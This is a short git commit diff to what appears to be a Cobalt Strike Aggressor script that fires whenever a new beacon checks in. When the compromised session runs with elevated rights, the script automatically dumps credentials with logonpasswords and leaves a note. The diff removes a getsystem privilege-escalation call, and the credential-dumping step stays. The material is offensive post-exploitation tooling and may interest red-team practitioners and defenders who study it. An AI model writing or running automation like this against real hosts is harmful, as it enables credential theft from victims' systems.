Update Initial-LAdminCheck.cna

This commit is contained in:
Alexander Rymdeko-Harvey
2016-07-01 09:22:49 -04:00
committed by GitHub
parent 5111a92dc6
commit 30d64ffe62
+1 -2
View File
@@ -23,7 +23,6 @@ on beacon_initial {
$b = "*";
if ($b isin $a)
{
bgetsystem($1);
blogonpasswords($1);
beacon_note($1, "Elevated Context: Ran LogonPasswords");
}
@@ -51,4 +50,4 @@ on beacon_output {
# All intial beacons run script
# event triggers on output
# if it matches known string it executes logic
# if intial matches a * in name it executes logic
# if intial matches a * in name it executes logic